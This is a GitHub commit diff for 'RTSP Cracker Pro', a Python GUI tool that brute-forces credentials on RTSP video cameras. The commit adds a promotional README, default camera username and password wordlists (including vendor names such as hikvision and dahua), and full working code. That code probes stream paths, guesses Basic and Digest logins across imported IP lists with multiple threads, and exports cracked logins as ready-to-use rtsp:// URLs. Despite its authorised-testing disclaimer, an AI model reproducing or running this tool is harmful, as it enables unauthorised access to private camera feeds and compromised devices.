增加功能

增加一键查看结果和导出rtsp格式路径功能
This commit is contained in:
returnwrong 2025-02-07 20:15:58 +08:00 committed by GitHub
parent 0a58f0c33c
commit 5d6fa177c0
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
4 changed files with 707 additions and 33 deletions

153
README.md
View File

@ -1,4 +1,149 @@
# 用于rtsp协议爆破的工具
## 把代码下载到本地python3 rtsp_crack_gui.py
### 图形化使用非常简单,后续会做教程视频和文章放在这里
### 都要下载呀,否则运行会异常!!
# 🎯 RTSP Cracker Pro
> 一款颜值与实力并存的RTSP设备安全测试工具
RTSP Cracker Pro 是一个用于RTSP设备安全测试的现代化图形工具。告别命令行的繁琐操作让安全测试变得简单优雅。无论你是安全研究人员、网络工程师还是安全爱好者这都将是你的得力助手。
![RTSP Cracker Pro](screenshot.png)
## ✨ 为什么选择 RTSP Cracker Pro
- 🎨 **颜值即正义** - 现代化UI设计简洁优雅的操作界面
- 🚀 **快如闪电** - 多线程并发处理,效率提升数倍
- 🛠️ **功能强大** - 支持多种认证方式自动URI探测
- 🎯 **精准可靠** - 实时显示破解进度,结果一目了然
- 📦 **开箱即用** - 无需安装依赖纯Python标准库实现
- 🔄 **持续更新** - 定期维护更新,解决用户反馈
## 🔧 功能特点
- 💫 支持Basic和Digest双认证模式
- 📝 支持批量导入IP列表
- 🔍 智能URI路径探测
- 📊 实时进度显示
- 💾 一键导出结果
- 🔗 快捷RTSP链接生成
- 📋 剪贴板快速复制
- 🎨 现代化界面设计
## 🚀 快速开始
### 环境要求
- Python 3.7+
- 无需任何第三方库!
### 三步开始使用
1⃣ 克隆仓库:
```bash
git clone https://github.com/yourusername/rtsp-cracker-pro.git
cd rtsp-cracker-pro
```
2⃣ 运行程序:
```bash
python rtsp_crack_gui.py
```
3⃣ 开始破解!
## 📚 使用指南
### 🎯 基本配置
1. **目标配置**
- 🔹 单个IP测试直接输入目标IP
- 🔹 批量IP测试导入IP列表文件
- 🔹 自定义端口默认554可按需修改
2. **字典配置**
- 🔹 URI字典设备访问路径字典
- 🔹 用户名字典:可能的用户名列表
- 🔹 密码字典:可能的密码列表
3. **认证方式**
- 🔹 Digest认证默认模式更安全
- 🔹 Basic认证兼容老设备
### 🎮 操作流程
1. 设置目标IP单个/批量)
2. 选择字典文件URI/用户名/密码)
3. 选择认证方式
4. 点击开始,坐等结果!
### 📊 结果管理
- 📋 实时查看破解结果
- 💾 导出RTSP链接
- 📎 一键复制到剪贴板
- 📑 详细信息导出
## 📝 字典文件格式
简单直观的纯文本格式:
```text
# uri.txt - URI路径字典
/
/11
/12
/h264/ch1/main/av_stream
/cam/realmonitor
# username.txt - 用户名字典
admin
root
supervisor
# password.txt - 密码字典
12345
admin123
password
```
## 🎬 使用技巧
- 💡 合理控制线程数建议5-10个
- 💡 定期更新字典库,提高成功率
- 💡 使用前先测试单个IP
- 💡 注意保存重要的破解结果
## ⚠️ 注意事项
- 🚫 仅用于授权的安全测试
- 📌 建议备份重要字典文件
- ⚡ 注意控制并发数量
- 🔒 遵守相关法律法规
## 👥 关于我们
- 🧙‍♂️ **xxtt** - *核心开发*
- 🎨 **地图大师returnwrong**- *核心开发*
## 🤝 参与贡献
我们欢迎各种形式的贡献:
- 🐛 提交Bug报告
- 💡 新功能建议
- 📝 完善文档
- 🔧 提交代码
## 📜 许可证
MIT License - 详见 [LICENSE](LICENSE) 文件
## ⚠️ 免责声明
本工具仅供安全研究和授权测试使用。任何未经授权的测试行为造成的后果,需自行承担全部责任。
---
如果觉得这个工具对你有帮助,请给个 Star ⭐️ 支持一下!
[反馈问题](https://github.com/yourusername/rtsp-cracker-pro/issues) | [功能建议](https://github.com/yourusername/rtsp-cracker-pro/issues)

View File

@ -1,4 +1,20 @@
vbnd
asd
admin
password
12345
123456
password
admin123
root
admin888
888888
666666
12345678
hikvision
dahua
camera
system123
admin12345
admin@123
root123
P@ssw0rd
123456789
admin123456

View File

@ -9,8 +9,274 @@ from typing import List, Optional
from dataclasses import dataclass
import threading
from datetime import datetime
from rtsp_crack import RTSPConfig, RTSPCracker
import time
import re # 添加re模块导入
@dataclass
class RTSPConfig:
"""RTSP配置类"""
server_ip: str = ""
server_port: int = 554
server_path: str = ""
user_agent: str = "RTSP Client"
buffer_len: int = 1024
username_file: str = ""
password_file: str = ""
uri_file: str = ""
brute_force_method: str = 'Digest'
@property
def base_url(self) -> str:
return f'rtsp://{self.server_ip}:{self.server_port}{self.server_path}'
class RTSPCracker:
"""RTSP破解器类"""
def __init__(self, config: RTSPConfig):
self.config = config
self.socket = None
self.should_stop = False
def connect(self) -> None:
"""建立socket连接"""
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((self.config.server_ip, self.config.server_port))
except socket.error as e:
print(f"[-] 连接失败: {str(e)}")
raise
def gen_base_auth_header(self, username: str, password: str) -> str:
"""生成Basic认证头"""
auth_64 = base64.b64encode(f"{username}:{password}".encode()).decode()
header = (
f'DESCRIBE {self.config.base_url} RTSP/1.0\r\n'
f'CSeq: 4\r\n'
f'User-Agent: {self.config.user_agent}\r\n'
f'Accept: application/sdp\r\n'
f'Authorization: Basic {auth_64}\r\n\r\n'
)
return header
def gen_digest_header(self) -> str:
"""生成Digest认证请求头"""
return (
f'DESCRIBE {self.config.base_url} RTSP/1.0\r\n'
f'CSeq: 4\r\n'
f'User-Agent: {self.config.user_agent}\r\n'
f'Accept: application/sdp\r\n\r\n'
)
def gen_digest_auth_header(self, username: str, password: str, realm: str, nonce: str) -> str:
"""生成Digest认证头"""
response = self._calculate_digest_response(username, password, realm, nonce)
return (
f'DESCRIBE {self.config.base_url} RTSP/1.0\r\n'
f'CSeq: 5\r\n'
f'Authorization: Digest username="{username}", realm="{realm}", '
f'nonce="{nonce}", uri="{self.config.base_url}", response="{response}"\r\n'
f'User-Agent: {self.config.user_agent}\r\n'
f'Accept: application/sdp\r\n\r\n'
)
def _calculate_digest_response(self, username: str, password: str, realm: str, nonce: str) -> str:
"""计算Digest认证响应值"""
ha1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest()
ha2 = hashlib.md5(f"DESCRIBE:{self.config.base_url}".encode()).hexdigest()
return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()
def try_basic_auth(self, username: str, password: str) -> bool:
"""尝试Basic认证"""
header = self.gen_base_auth_header(username, password)
self.socket.send(header.encode())
response = self.socket.recv(self.config.buffer_len).decode()
return '200 OK' in response
def try_digest_auth(self, username: str, password: str) -> bool:
"""尝试Digest认证"""
# 获取realm和nonce
header = self.gen_digest_header()
self.socket.send(header.encode())
response = self.socket.recv(self.config.buffer_len).decode()
try:
if 'WWW-Authenticate: Digest' not in response:
print("[-] 服务器未返回Digest认证信息")
return False
realm = self._extract_value(response, 'realm')
nonce = self._extract_value(response, 'nonce')
except ValueError as e:
print(f"[-] 无法提取realm或nonce值: {str(e)}")
self.socket.close()
self.connect()
return False
# 发送认证请求
auth_header = self.gen_digest_auth_header(username, password, realm, nonce)
try:
self.socket.send(auth_header.encode())
response = self.socket.recv(self.config.buffer_len).decode()
if '200 OK' in response:
return True
elif 'Unauthorized' in response:
return False
else:
print(f"[*] 未知响应状态")
return False
except Exception as e:
print(f"[-] 发送认证请求时发生错误: {str(e)}")
self.socket.close()
self.connect()
return False
@staticmethod
def _extract_value(response: str, key: str) -> str:
"""从响应中提取值"""
try:
patterns = [
f'{key}="([^"]*)"',
f'{key}=([^,\s]*)',
f'{key}=\'([^\']*)\'',
]
for pattern in patterns:
match = re.search(pattern, response)
if match:
return match.group(1)
raise ValueError(f"在响应中未找到{key}的值")
except Exception as e:
raise ValueError(f"提取{key}时发生错误: {str(e)}")
def uri_bruteforce(self) -> Optional[List[str]]:
"""URI路径爆破"""
if not os.path.exists('uri.txt'):
print("[-] 未找到uri.txt文件")
return None
print("[+] 开始URI路径爆破...")
found_uris = []
with open('uri.txt', 'r') as f:
uris = f.read().splitlines()
for uri in uris:
if not uri.strip():
continue
uri = f"/{uri.lstrip('/')}"
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as test_socket:
test_socket.connect((self.config.server_ip, self.config.server_port))
header = (
f'DESCRIBE rtsp://{self.config.server_ip}:{self.config.server_port}{uri} RTSP/1.0\r\n'
f'CSeq: 1\r\n'
f'User-Agent: {self.config.user_agent}\r\n'
f'Accept: application/sdp\r\n\r\n'
)
test_socket.send(header.encode())
response = test_socket.recv(self.config.buffer_len).decode()
if ('401 Unauthorized' in response or
'WWW-Authenticate' in response or
'Authorization' in response):
print(f"[+] 发现有效URI: {uri} (需要认证)")
found_uris.append(uri)
self.config.server_path = uri
return found_uris
except Exception as e:
print(f"[-] 测试URI {uri} 时发生错误: {str(e)}")
continue
if not found_uris:
print("[-] 未找到有效URI将使用默认路径")
return found_uris
def stop(self):
"""设置停止标志"""
self.should_stop = True
if self.socket:
try:
self.socket.close()
except:
pass
def brute_force(self) -> tuple:
"""执行暴力破解"""
self.should_stop = False
try:
self.connect()
found_uris = self.uri_bruteforce()
if found_uris:
print(f"[+] 使用发现的URI路径: {self.config.server_path}")
else:
print(f"[*] 使用默认路径: {self.config.server_path}")
print(f"[+] 开始使用 {self.config.brute_force_method} 方式进行暴力破解...")
with open(self.config.username_file, "r") as usernames:
for username in usernames:
if self.should_stop:
return False, {}
username = username.strip()
if not username:
continue
with open(self.config.password_file, "r") as passwords:
for password in passwords:
if self.should_stop:
return False, {}
password = password.strip()
if not password:
continue
print(f"[*] 尝试: {username}:{password}")
try:
if self.should_stop:
return False, {}
if self.config.brute_force_method == 'Basic':
if self.try_basic_auth(username, password):
print(f"[+] 发现有效凭据 -- {username}:{password}")
return True, {
"username": username,
"password": password,
"uri": self.config.server_path
}
else:
if self.try_digest_auth(username, password):
print(f"[+] 发现有效凭据 -- {username}:{password}")
return True, {
"username": username,
"password": password,
"uri": self.config.server_path
}
except Exception as e:
if self.should_stop:
return False, {}
print(f"[-] 尝试 {username}:{password} 时发生错误: {str(e)}")
self.socket.close()
self.connect()
continue
return False, {}
finally:
if self.socket:
try:
self.socket.close()
except:
pass
class ModernStyle:
"""现代化样式配置"""
@ -81,7 +347,7 @@ class RTSPCrackerGUI:
self.root = root
self.root.title("RTSP Cracker Pro")
self.root.configure(bg=ModernStyle.BG_COLOR)
self.root.geometry("1000x800") # 增加窗口默认大小
self.root.geometry("1000x800")
# 创建配置
self.config = RTSPConfig()
@ -94,11 +360,14 @@ class RTSPCrackerGUI:
# 标记是否正在运行
self.is_running = False
self.stop_event = threading.Event() # 添加停止事件标志
self.active_threads = []
self.thread_lock = threading.Lock()
self.crack_results = []
# 添加线程控制
self.max_threads = 5 # 默认最大线程数
self.active_threads = []
self.thread_lock = threading.Lock()
self.crackers = {} # 添加字典来存储每个线程的cracker实例
def create_gui(self):
"""创建现代化图形界面"""
@ -277,6 +546,14 @@ class RTSPCrackerGUI:
command=self.clear_output)
self.clear_button.pack(side=tk.LEFT, padx=5)
self.view_results_button = ModernButton(control_frame, text="查看结果",
command=self.show_results)
self.view_results_button.pack(side=tk.LEFT, padx=5)
self.export_url_button = ModernButton(control_frame, text="导出RTSP链接",
command=self.export_rtsp_urls)
self.export_url_button.pack(side=tk.LEFT, padx=5)
# 输出区域
output_frame = self._create_frame(main_container, "输出日志")
output_frame.pack(fill=tk.BOTH, expand=True)
@ -398,6 +675,9 @@ class RTSPCrackerGUI:
def crack_single_target(self, ip):
"""对单个目标进行破解"""
try:
if not self.is_running:
return
config = RTSPConfig()
config.server_ip = ip
config.server_port = self.config.server_port
@ -407,15 +687,39 @@ class RTSPCrackerGUI:
config.brute_force_method = self.config.brute_force_method
cracker = RTSPCracker(config)
with self.thread_lock:
self.crackers[threading.current_thread()] = cracker
print(f"[*] 开始破解目标: {ip}")
cracker.brute_force()
print(f"[*] 完成目标: {ip}")
# 获取破解结果
success, result = cracker.brute_force()
if success and self.is_running: # 只在运行状态下添加结果
with self.thread_lock:
self.add_crack_result(
ip=ip,
port=config.server_port,
username=result['username'],
password=result['password'],
uri=result.get('uri', '')
)
print(f"[+] 成功添加破解结果: {ip}")
if self.is_running:
print(f"[*] 完成目标: {ip}")
except Exception as e:
print(f"[-] 破解 {ip} 时发生错误: {str(e)}")
if self.is_running:
print(f"[-] 破解 {ip} 时发生错误: {str(e)}")
finally:
with self.thread_lock:
self.active_threads.remove(threading.current_thread())
if threading.current_thread() in self.crackers:
try:
self.crackers[threading.current_thread()].stop()
except:
pass
del self.crackers[threading.current_thread()]
if threading.current_thread() in self.active_threads:
self.active_threads.remove(threading.current_thread())
def start_crack(self):
"""开始破解"""
@ -460,11 +764,33 @@ class RTSPCrackerGUI:
def stop_crack(self):
"""停止破解"""
self.is_running = False
if not self.is_running:
return
print("[*] 正在停止所有任务...")
self.is_running = False
# 停止所有正在运行的破解器
with self.thread_lock:
for cracker in self.crackers.values():
try:
cracker.stop()
except:
pass
# 等待所有线程完成
for thread in self.active_threads:
thread.join()
try:
for thread in self.active_threads.copy():
if thread.is_alive():
thread.join(timeout=0.5)
except:
pass
# 清理资源
with self.thread_lock:
self.crackers.clear()
self.active_threads.clear()
print("[+] 所有任务已停止")
self.start_button.configure(state=tk.NORMAL)
self.stop_button.configure(state=tk.DISABLED)
@ -479,26 +805,35 @@ class RTSPCrackerGUI:
# 等待线程数量低于最大值
while len(self.active_threads) >= self.max_threads:
if not self.is_running:
return
break
# 清理已完成的线程
self.active_threads = [t for t in self.active_threads if t.is_alive()]
time.sleep(0.1)
if not self.is_running:
break
# 创建新线程
thread = threading.Thread(target=self.crack_single_target, args=(ip,))
self.active_threads.append(thread)
with self.thread_lock:
self.active_threads.append(thread)
thread.start()
# 等待所有线程完成
for thread in self.active_threads:
thread.join()
# 等待所有活动线程完成
while self.active_threads and self.is_running:
self.active_threads = [t for t in self.active_threads if t.is_alive()]
time.sleep(0.1)
except Exception as e:
print(f"[-] 错误: {str(e)}")
finally:
self.is_running = False
self.start_button.configure(state=tk.NORMAL)
self.stop_button.configure(state=tk.DISABLED)
self.root.after(100, self._update_buttons)
def _update_buttons(self):
"""在主线程中更新按钮状态"""
self.start_button.configure(state=tk.NORMAL)
self.stop_button.configure(state=tk.DISABLED)
def import_ip_list(self):
"""导入IP列表"""
@ -530,6 +865,180 @@ class RTSPCrackerGUI:
except Exception as e:
print(f"[-] 导入IP列表失败: {str(e)}")
def add_crack_result(self, ip, port, username, password, uri=""):
"""添加破解成功的结果"""
result = {
"ip": ip,
"port": port,
"username": username,
"password": password,
"uri": uri,
"time": datetime.now().strftime("%Y-%m-%d %H:%M:%S")
}
self.crack_results.append(result)
def show_results(self):
"""显示破解结果窗口"""
results_window = tk.Toplevel(self.root)
results_window.title("破解成功结果")
results_window.configure(bg=ModernStyle.BG_COLOR)
results_window.geometry("800x600") # 增加窗口大小
# 设置窗口在主窗口中居中
results_window.transient(self.root)
x = self.root.winfo_x() + (self.root.winfo_width() - 800) // 2
y = self.root.winfo_y() + (self.root.winfo_height() - 600) // 2
results_window.geometry(f"800x600+{x}+{y}")
results_window.grab_set()
# 创建结果显示区域
results_text = scrolledtext.ScrolledText(
results_window,
bg=ModernStyle.ACCENT_COLOR,
fg=ModernStyle.FG_COLOR,
font=ModernStyle.MAIN_FONT,
padx=10,
pady=10
)
results_text.pack(fill=tk.BOTH, expand=True, padx=10, pady=10)
if not self.crack_results:
results_text.insert(tk.END, "暂无破解成功的结果\n")
else:
results_text.insert(tk.END, "=== RTSP URLs ===\n\n")
# 首先显示所有RTSP URLs
for result in self.crack_results:
rtsp_url = (f"rtsp://{result['username']}:{result['password']}@"
f"{result['ip']}:{result['port']}{result['uri']}")
results_text.insert(tk.END, f"{rtsp_url}\n")
# 然后显示详细信息
results_text.insert(tk.END, "\n=== 详细信息 ===\n\n")
for i, result in enumerate(self.crack_results, 1):
results_text.insert(tk.END, f"[设备 {i}]\n")
results_text.insert(tk.END, f"发现时间: {result['time']}\n")
results_text.insert(tk.END, f"设备地址: {result['ip']}:{result['port']}\n")
results_text.insert(tk.END, f"登录凭据: {result['username']}:{result['password']}\n")
if result['uri']:
results_text.insert(tk.END, f"访问路径: {result['uri']}\n")
results_text.insert(tk.END, "="*30 + "\n\n")
# 添加按钮框架
button_frame = tk.Frame(results_window, bg=ModernStyle.BG_COLOR)
button_frame.pack(pady=10)
# 添加复制按钮
copy_button = ModernButton(
button_frame,
text="复制RTSP链接",
command=lambda: self.copy_rtsp_urls(self.crack_results)
)
copy_button.pack(side=tk.LEFT, padx=5)
export_button = ModernButton(
button_frame,
text="导出结果",
command=lambda: self.export_results(self.crack_results)
)
export_button.pack(side=tk.LEFT, padx=5)
close_button = ModernButton(
button_frame,
text="关闭",
command=results_window.destroy
)
close_button.pack(side=tk.LEFT, padx=5)
def copy_rtsp_urls(self, results):
"""复制RTSP URLs到剪贴板"""
if not results:
print("[-] 没有可复制的结果")
return
urls = []
for result in results:
rtsp_url = (f"rtsp://{result['username']}:{result['password']}@"
f"{result['ip']}:{result['port']}{result['uri']}")
urls.append(rtsp_url)
# 将所有URL复制到剪贴板
self.root.clipboard_clear()
self.root.clipboard_append('\n'.join(urls))
print("[+] RTSP链接已复制到剪贴板")
def export_results(self, results):
"""导出破解结果"""
if not results:
print("[-] 没有可导出的结果")
return
filename = filedialog.asksaveasfilename(
defaultextension=".txt",
filetypes=[("文本文件", "*.txt")],
title="导出破解结果"
)
if filename:
try:
with open(filename, 'w', encoding='utf-8') as f:
f.write("=== RTSP破解结果 ===\n\n")
for result in results:
f.write(f"时间: {result['time']}\n")
f.write(f"IP地址: {result['ip']}\n")
f.write(f"端口: {result['port']}\n")
f.write(f"用户名: {result['username']}\n")
f.write(f"密码: {result['password']}\n")
if result['uri']:
f.write(f"URI: {result['uri']}\n")
f.write("="*30 + "\n\n")
print(f"[+] 结果已导出到: {filename}")
except Exception as e:
print(f"[-] 导出结果失败: {str(e)}")
def export_rtsp_urls(self):
"""导出RTSP URL格式的结果"""
if not self.crack_results:
print("[-] 没有可导出的结果")
return
filename = filedialog.asksaveasfilename(
defaultextension=".txt",
filetypes=[("文本文件", "*.txt")],
title="导出RTSP链接"
)
if filename:
try:
with open(filename, 'w', encoding='utf-8') as f:
f.write("=== RTSP URLs ===\n\n")
for result in self.crack_results:
# 构建RTSP URL
rtsp_url = (f"rtsp://{result['username']}:{result['password']}@"
f"{result['ip']}:{result['port']}{result['uri']}")
f.write(f"{rtsp_url}\n")
# 添加说明信息
f.write("\n=== 详细信息 ===\n")
for i, result in enumerate(self.crack_results, 1):
f.write(f"\n[设备 {i}]\n")
f.write(f"发现时间: {result['time']}\n")
f.write(f"设备地址: {result['ip']}:{result['port']}\n")
f.write(f"登录凭据: {result['username']}:{result['password']}\n")
if result['uri']:
f.write(f"访问路径: {result['uri']}\n")
f.write("-" * 30 + "\n")
print(f"[+] RTSP链接已导出到: {filename}")
# 自动打开导出的文件
try:
os.startfile(filename)
except:
pass # 如果无法自动打开文件,则忽略
except Exception as e:
print(f"[-] 导出RTSP链接失败: {str(e)}")
def main():
root = tk.Tk()
app = RTSPCrackerGUI(root)

View File

@ -1,6 +1,10 @@
damin
asdzxc
vvmvmv
asdas
sdddddd
admin
admin
root
administrator
system
supervisor
user
guest
camera
rtsp
hikvision